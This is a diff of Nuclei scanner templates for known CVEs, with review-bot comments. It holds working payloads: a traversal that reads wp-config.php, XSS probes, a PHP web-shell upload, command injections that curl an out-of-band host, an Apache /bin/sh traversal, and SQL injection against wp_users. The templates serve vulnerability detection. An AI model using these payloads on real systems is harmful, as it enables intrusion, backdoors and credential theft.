     20 + google-dork: inurl:/wp-content/plugins/revslider
     21 + tags: cve,cve2015,wordpress,wp-plugin,lfi,revslider,wp
     22 + 
     23 +requests:
     24 + - method: GET
     25 + path:
     26 + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
     27 + - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
     28 + 
     29 + stop-at-first-match: true
     30 + matchers-condition: and
     31 + matchers:
     32 + - type: word
     33 + part: body
     34 + words:
     35 + - "'DB_NAME'"
     36 + - "'DB_PASSWORD'"
     37 + - "'DB_USER'"
     38 + condition: and
     39 + 
     40 + - type: status
     41 + status:
     42 + - 200
     43 + 
     44 +# Enhanced by mp on 2022/07/29
     45 + 
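Review bot: `name` says Slider Revolution while the description (the NVD text for CVE-2015-1579) names the Elegant Themes Divi theme, so a reader cannot tell which product is meant; add one sentence noting that the Divi theme bundles the revslider plugin, which is what the `action=revslider_show_image` request exercises. The second `/blog/` path with `stop-at-first-match: true` is fine.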
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-4127.yaml
     1 +id: CVE-2015-4127
     2 + 
     3 +info:
     4 + name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
     5 + author: daffainfo
     6 + severity: medium
     7 + description: |
     8 + Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
     9 + reference:
     10 + - https://www.exploit-db.com/exploits/37112
     11 + - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
     13 + - https://wordpress.org/plugins/church-admin/changelog/
     14 + tags: cve,cve2015,wordpress,xss,wp-plugin,wp
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + part: body
     25 + words:
     26 + - "</script><script>alert(document.domain)</script>"
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - text/html
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
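Review bot: the request (`includes/validate.php?id=...`) does not exercise the `address` parameter on the registration form that the description names, so it is unclear which issue the template actually tests; either cite the reference the `validate.php?id` vector comes from or align the description with the request. Also missing is the `classification` block (`cve-id`, `cwe-id: CWE-79`) that the other new templates in this commit carry.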
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-20526.yaml
     1 +id: CVE-2018-20526
     2 + 
     3 +info:
     4 + name: Roxy Fileman 1.4.5 - Unrestricted File Upload
     5 + author: DhiyaneshDK
     6 + severity: critical
     7 + description: |
     8 + Roxy Fileman 1.4.5 allows unrestricted file upload in upload.php.
     9 + reference:
     10 + - http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html
     11 + - https://www.exploit-db.com/exploits/46085/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20526
     13 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20526
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 9.8
     17 + cve-id: CVE-2018-20526
     18 + cwe-id: CWE-434
     19 + metadata:
     20 + google-dork: intitle:"Roxy file manager"
     21 + verified: "true"
     22 + tags: cve,cve2018,roxy,fileman,rce,upload,intrusive
     23 + 
     24 +requests:
     25 + - raw:
     26 + - |
     27 + POST /php/upload.php HTTP/1.1
     28 + Host: {{Hostname}}
     29 + Accept: */*
     30 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP
     31 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
     32 + Origin: {{BaseURL}}
     33 + Referer: {{BaseURL}}
     34 + Accept-Encoding: gzip, deflate
     35 + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
     36 + 
     37 + ------WebKitFormBoundary20kgW2hEKYaeF5iP
     38 + Content-Disposition: form-data; name="action"
     39 + 
     40 + upload
     41 + ------WebKitFormBoundary20kgW2hEKYaeF5iP
     42 + Content-Disposition: form-data; name="method"
     43 + 
     44 + ajax
     45 + ------WebKitFormBoundary20kgW2hEKYaeF5iP
     46 + Content-Disposition: form-data; name="d"
     47 + 
     48 + /Uploads
     49 + ------WebKitFormBoundary20kgW2hEKYaeF5iP
     50 + Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php7"
     51 + Content-Type: application/octet-stream
     52 + 
     53 + <?php
     54 + echo exec($_GET["cmd"]);
     55 + ?>
     56 + 
     57 + ------WebKitFormBoundary20kgW2hEKYaeF5iP--
     58 + 
     59 + - |
     60 + GET /Uploads/{{randstr}}.php7?cmd=echo+"roxyfileman"+|+rev HTTP/1.1
     61 + Host: {{Hostname}}
     62 + 
     63 + cookie-reuse: true
     64 + redirects: true
     65 + max-redirects: 2
     66 + matchers-condition: and
     67 + matchers:
     68 + - type: word
     69 + part: body
     70 + words:
     71 + - "namelifyxor"
     72 + 
     73 + - type: word
     74 + part: header
     75 + words:
     76 + - text/html
     77 + 
     78 + - type: status
     79 + status:
     80 + - 200
     81 + 
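Review bot: the template uploads a PHP file containing `exec($_GET["cmd"])` and never removes it, so every scan of a vulnerable Roxy Fileman instance leaves a command-execution file under `/Uploads/` for anyone who finds it; the `intrusive` tag does not mitigate that. The check should upload a file that only emits a static marker (no `exec`, no `$_GET`) and, where the product exposes a delete action, remove it in a follow-up request; at minimum the commit message must warn operators about the leftover artifact. Smaller points: `/php/upload.php` and `/Uploads` assume the default install layout, and the long `User-Agent` header is unnecessary noise in a template.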
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-0193.yaml
    skipped 33 lines
    34 34   Content-type: application/x-www-form-urlencoded
    35 35   X-Requested-With: XMLHttpRequest
    36 36   
    37  - command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
     37 + command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
    38 38   
    39 39   extractors:
    40 40   - type: regex
    skipped 19 lines
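Review bot: dropping `http://` before `{{interactsh-url}}` is behaviour-preserving for curl, which defaults to http when no scheme is given, but the same edit is applied to four templates in this commit without explanation; state the motivation in the commit message (for instance whether the placeholder is now expected to expand with its own scheme) so the remaining templates that still prefix `http://` can be brought in line deliberately.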
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-10758.yaml
    skipped 25 lines
    26 26   Authorization: Basic YWRtaW46cGFzcw==
    27 27   Content-Type: application/x-www-form-urlencoded
    28 28   
    29  - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}")
     29 + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl{{interactsh-url}}")
    30 30   matchers:
    31 31   - type: word
    32 32   part: interactsh_protocol # Confirms the HTTP Interaction
    skipped 5 lines
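Review bot: the new line has no space between `curl` and the placeholder (`execSync("curl{{interactsh-url}}")`), so the shell will look for a binary named `curl<host>` and the interaction can never fire; it should read `execSync("curl {{interactsh-url}}")`, matching the `curl%20{{interactsh-url}}` form used in the CVE-2019-17558 hunk of this same commit.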
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-17558.yaml
    skipped 38 lines
    39 39   }
    40 40   
    41 41   - |
    42  - GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
     42 + GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
    43 43   Host: {{Hostname}}
    44 44   Connection: close
    45 45   
    skipped 21 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-3929.yaml
    skipped 21 lines
    22 22   path:
    23 23   - "{{BaseURL}}/cgi-bin/file_transfer.cgi"
    24 24   
    25  - body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27"
     25 + body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"
    26 26   headers:
    27 27   Content-Type: application/x-www-form-urlencoded
    28 28   
    skipped 9 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-10973.yaml
     1 +id: CVE-2020-10973
     2 + 
     3 +info:
     4 + name: Wavlink WN530HG4 - Access Control
     5 + author: arafatansari
     6 + severity: high
     7 + description: |
     8 + An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
     9 + reference:
     10 + - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-10973
     12 + - https://github.com/sudo-jtcsec/Nyra
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     15 + cvss-score: 7.5
     16 + cve-id: CVE-2020-10973
     17 + cwe-id: CWE-306
     18 + metadata:
     19 + shodan-query: http.html:"Wavlink"
     20 + verified: "true"
     21 + tags: cve,cve2020,exposure,wavlink
     22 + 
     23 +requests:
     24 + - raw:
     25 + - |
     26 + GET /backupsettings.dat HTTP/1.1
     27 + Host: {{Hostname}}
     28 + 
     29 + matchers-condition: and
     30 + matchers:
     31 + - type: word
     32 + part: body
     33 + words:
     34 + - 'Salted__'
     35 + 
     36 + - type: word
     37 + part: header
     38 + words:
     39 + - application/octet-stream
     40 + 
     41 + - type: status
     42 + status:
     43 + - 200
     44 + 
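Review bot: the description and the request disagree: the description says the exposure is reached through "a crafted POST request" to `/cgi-bin/ExportAllSettings.sh`, while the template only sends `GET /backupsettings.dat` and matches on an `application/octet-stream` body starting with `Salted__`. Either state in the description that the check looks for the exported settings file rather than the export endpoint, or add the endpoint the description names; as written a reader cannot tell which behaviour a hit confirms.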
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-20167.yaml
    skipped 22 lines
    23 23   POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
    24 24   Host: {{Hostname}}
    25 25   
    26  - "name":"';$(curl http://{{interactsh-url}});'",
     26 + "name":"';$(curl {{interactsh-url}});'",
    27 27   "email":"[email protected]"
    28 28   
    29 29   matchers:
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24165.yaml
     1 +id: CVE-2021-24165
     2 + 
     3 +info:
     4 + name: Ninja Forms < 3.4.34 - Administrator Open Redirect
     5 + author: dhiyaneshDk,daffainfo
     6 + severity: medium
     7 + description: |
     8 + The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
     9 + reference:
     10 + - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24165
     12 + - https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2021-24165
     17 + cwe-id: CWE-601
     18 + tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp
     19 + 
     20 +requests:
     21 + - raw:
     22 + - |
     23 + POST /wp-login.php HTTP/1.1
     24 + Host: {{Hostname}}
     25 + Origin: {{RootURL}}
     26 + Content-Type: application/x-www-form-urlencoded
     27 + Cookie: wordpress_test_cookie=WP%20Cookie%20check
     28 + 
     29 + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
     30 + 
     31 + - |
     32 + GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
     33 + Host: {{Hostname}}
     34 + 
     35 + req-condition: true
     36 + cookie-reuse: true
     37 + matchers:
     38 + - type: dsl
     39 + dsl:
     40 + - 'status_code_1 == 302'
     41 + - 'status_code_2 == 302'
     42 + - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
     43 + condition: and
     44 + 
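Review bot: the login request uses `{{username}}` and `{{password}}` but nothing in the template declares or documents them (no `variables:` block, no note in `description`), so a run without externally supplied values sends literal placeholders and the `status_code_1 == 302` condition fails silently. Add a `variables:` section or a line in the description stating that both must be passed in, matching the `authenticated` tag you already set.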
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24838.yaml
    1 1  id: CVE-2021-24838
    2 2   
    3 3  info:
    4  - name: AnyComment <= 0.2.21 - Open Redirect
     4 + name: AnyComment < 0.3.5 - Open Redirect
    5 5   author: noobexploiter
    6 6   severity: medium
    7  - description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to
    8  - the vendor, is a feature.
     7 + description: |
     8 + The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
    9 9   reference:
    10 10   - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2021-24838
    12 11   classification:
    13 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 13   cvss-score: 6.1
    15 14   cve-id: CVE-2021-24838
    16 15   cwe-id: CWE-601
    17  - tags: cve,cve2021,wordpress,wp-plugin,open-redirect
     16 + metadata:
     17 + verified: "true"
     18 + tags: cve,cve2021,wordpress,wp-plugin,redirect,anycomment
    18 19   
    19 20  requests:
    20 21   - method: GET
    21 22   path:
    22 23   - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
     24 + - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"
    23 25   
     26 + stop-at-first-match: true
    24 27   matchers-condition: and
    25 28   matchers:
    26 29   - type: regex
    skipped 8 lines
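Review bot: line 11 removes the `https://nvd.nist.gov/vuln/detail/CVE-2021-24838` reference while leaving only the wpscan entry, yet the other templates touched in this change add NVD links (CVE-2021-25112, CVE-2021-32789). Unless the removal is deliberate, keep the canonical reference alongside the new `metadata.verified` block and the second `redirect=` path.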
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24910.yaml
    skipped 10 lines
    11 11   - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
    12 12   - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
    13 13   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     16 + cvss-score: 6.1
     17 + cve-id: CVE-2021-24910
     18 + cwe-id: CWE-79
    14 19   metadata:
    15 20   verified: "true"
    16 21   tags: cve,cve2021,wordpress,wp-plugin,xss,wp
    skipped 24 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-25112.yaml
    1 1  id: CVE-2021-25112
    2 2   
    3 3  info:
    4  - name: WordPress WHMCS Bridge < 6.4b - Cross-Site Scripting
    5  - author: DhiyaneshDK
     4 + name: WHMCS Bridge < 6.4b - Cross-Site Scripting (XSS)
     5 + author: dhiyaneshDk
    6 6   severity: medium
    7  - description: WordPress WHMCS Bridge < 6.4b is susceptible to authenticated reflected cross-site scripting because the plugin does not sanitize and escape the error parameter before outputting it back in admin dashboard.
     7 + description: |
     8 + The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
    8 9   reference:
    9 10   - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
    10  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25112
    11 12   - https://plugins.trac.wordpress.org/changeset/2659751
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    15 16   cve-id: CVE-2021-25112
    16 17   cwe-id: CWE-79
    17  - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
     18 + tags: wordpress,wp-plugin,wp,authenticated,whmcs,xss
    18 19   
    19 20  requests:
    20 21   - raw:
    skipped 16 lines
    37 38   - type: word
    38 39   part: body
    39 40   words:
    40  - - "<img src onerror=alert(document.domain)>"
     41 + - "<strong><img src onerror=alert(document.domain)></strong>"
    41 42   
    42 43   - type: word
    43 44   part: header
    skipped 4 lines
    48 49   status:
    49 50   - 200
    50 51   
    51  -# Enhanced by mp on 2022/04/21
    52  - 
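Review bot: the new `tags` line drops `cve` and `cve2021`, which every other CVE template in this change retains (`cve,cve2021,...`), so this template would no longer be selected by a `-tags cve` or `-tags cve2021` run. Restore those two tags in front of `wordpress,wp-plugin,wp,authenticated,whmcs,xss`; the stricter `<strong>...</strong>` matcher is fine, and the removed `# Enhanced by mp` trailer should be handled the same way as the trailers added in CVE-2021-32789 and CVE-2022-1390.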
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-32789.yaml
     1 +id: CVE-2021-32789
     2 + 
     3 +info:
     4 + name: WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection
     5 + author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
     6 + severity: high
     7 + description: |
     8 + woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
     9 + reference:
     10 + - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
     11 + - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
     12 + - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
     13 + - https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a
     14 + - https://nvd.nist.gov/vuln/detail/CVE-2021-32789
     15 + classification:
     16 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     17 + cvss-score: 7.5
     18 + cve-id: CVE-2021-32789
     19 + cwe-id: CWE-89
     20 + tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp
     21 + 
     22 +requests:
     23 + - method: GET
     24 + path:
     25 + - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
     26 + 
     27 + matchers-condition: and
     28 + matchers:
     29 + - type: word
     30 + words:
     31 + - 'sqli-test'
     32 + - 'attribute_counts'
     33 + - 'price_range'
     34 + - 'term'
     35 + condition: and
     36 + 
     37 + - type: word
     38 + part: header
     39 + words:
     40 + - 'application/json'
     41 + 
     42 + - type: status
     43 + status:
     44 + - 200
     45 + 
     46 +# Enhanced by mp on 2022/03/21
     47 + 
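Review bot: `name` says "WooCommerce Blocks 2.5 to 5.5" but `description` says the issue affects "between version 2.5.0 and prior to version 2.5.16" and that patches start at 2.5.16; the two ranges should be reconciled so a triager knows which upper bound to trust. The `wc/store/products/collection-data` path and the `sqli-test` marker the matcher keys on are consistent with each other.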
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-33357.yaml
    skipped 20 lines
    21 21  requests:
    22 22   - method: GET
    23 23   path:
    24  - - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;"
     24 + - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"
    25 25   
    26 26   matchers-condition: and
    27 27   matchers:
    skipped 18 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-41773.yaml
    skipped 1 lines
    2 2   
    3 3  info:
    4 4   name: Apache 2.4.49 - Path Traversal and Remote Code Execution
    5  - author: daffainfo
     5 + author: daffainfo,666asd
    6 6   severity: high
    7 7   description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
    8 8   reference:
    skipped 10 lines
    19 19   cve-id: CVE-2021-41773
    20 20   cwe-id: CWE-22
    21 21   metadata:
     22 + verified: true
    22 23   shodan-query: apache version:2.4.49
    23 24   tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
    24 25   
     26 +variables:
     27 + cmd: "echo COP-37714-1202-EVC | rev"
     28 + 
    25 29  requests:
    26 30   - raw:
    27 31   - |
    28  - GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
     32 + GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
    29 33   Host: {{Hostname}}
    30 34   
    31 35   - |
    32  - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
     36 + POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
    33 37   Host: {{Hostname}}
    34 38   Content-Type: application/x-www-form-urlencoded
    35 39   
    36  - echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
     40 + echo Content-Type: text/plain; echo; {{cmd}}
    37 41   
     42 + stop-at-first-match: true
    38 43   matchers-condition: or
    39 44   matchers:
    40 45   
    skipped 12 lines
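Review bot: `verified: true` on the new line 22 is an unquoted YAML boolean, while the other templates in this change write the same field as a string (`verified: "true"` in CVE-2020-10973, CVE-2021-24838, CVE-2021-42627); pick one representation so metadata consumers see one type. The `variables.cmd` extraction is otherwise a clean refactor: `COP-37714-1202-EVC` reversed still yields the same marker the old inline command produced.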
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-42013.yaml
    skipped 1 lines
    2 2   
    3 3  info:
    4 4   name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
    5  - author: nvn1729,0xd0ff9
     5 + author: nvn1729,0xd0ff9,666asd
    6 6   severity: critical
    7 7   description: |
    8 8   A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
    skipped 8 lines
    17 17   cvss-score: 9.8
    18 18   cve-id: CVE-2021-42013
    19 19   cwe-id: CWE-22
     20 + metadata:
     21 + verified: true
    20 22   tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev
    21 23   
     24 +variables:
     25 + cmd: "echo COP-37714-1202-EVC | rev"
     26 + 
    22 27  requests:
    23 28   - raw:
    24 29   - |+
    25  - GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
     30 + GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
    26 31   Host: {{Hostname}}
    27 32   Origin: {{BaseURL}}
    28 33   
    skipped 8 lines
    37 42   Origin: {{BaseURL}}
    38 43   Content-Type: application/x-www-form-urlencoded
    39 44   
    40  - echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev
     45 + echo Echo: CVE-2021-42013; echo; {{cmd}};
    41 46   
     47 + stop-at-first-match: true
    42 48   unsafe: true
    43 49   matchers-condition: or
    44 50   matchers:
    skipped 13 lines
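Review bot: the marker changes meaning here. The removed line 40 ran `echo 31024-1202-EVC | rev`, which reverses to `CVE-2021-42013`, but the new `variables.cmd` is `echo COP-37714-1202-EVC | rev`, copied from the CVE-2021-41773 template, which reverses to `CVE-2021-41773-POC`. The matchers are outside this hunk; confirm they were updated to the new string, and note that the replaced header `Content-Type: text/plain` is now `Echo: CVE-2021-42013`, so any matcher on the content type of this response also needs a second look.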
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-42627.yaml
     1 +id: CVE-2021-42627
     2 + 
     3 +info:
     4 + name: D-Link DIR-615 - Unauthorized Access
     5 + author: For3stCo1d
     6 + severity: critical
     7 + description: |
     8 + The WAN configuration page "wan.htm" on D-Link DIR-615 devices with firmware 20.06 can be accessed directly without authentication which can lead to disclose the information about WAN settings and also leverage attacker to modify the data fields of page.
     9 + reference:
     10 + - https://github.com/sanjokkarki/D-Link-DIR-615/blob/main/CVE-2021-42627
     11 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42627
     12 + - https://www.dlink.com/en/security-bulletin/
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     15 + cvss-score: 9.8
     16 + cve-id: CVE-2021-42627
     17 + metadata:
     18 + shodan-query: http.title:"Roteador Wireless"
     19 + verified: "true"
     20 + tags: cve,cve2021,d-link,router,unauth,dir-615,roteador
     21 + 
     22 +requests:
     23 + - method: GET
     24 + path:
     25 + - "{{BaseURL}}/wan.htm"
     26 + 
     27 + matchers-condition: and
     28 + matchers:
     29 + - type: word
     30 + part: body
     31 + words:
     32 + - "src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");"
     33 + - "var ipv6conntype"
     34 + condition: and
     35 + 
     36 + - type: word
     37 + part: header
     38 + words:
     39 + - Virtual Web
